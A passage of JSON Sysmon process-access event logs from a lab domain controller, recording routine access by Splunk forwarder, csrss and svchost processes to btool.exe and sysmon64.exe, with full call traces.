Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-00100EE40300}","TargetProcessId":"3964","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1972,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-00100EE40300}\r\nTargetProcessId: 3964\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-00100EE40300}","TargetProcessId":"3964","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1973,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1974,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1975,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1976,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1977,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1978,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1979,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.427\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.427","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
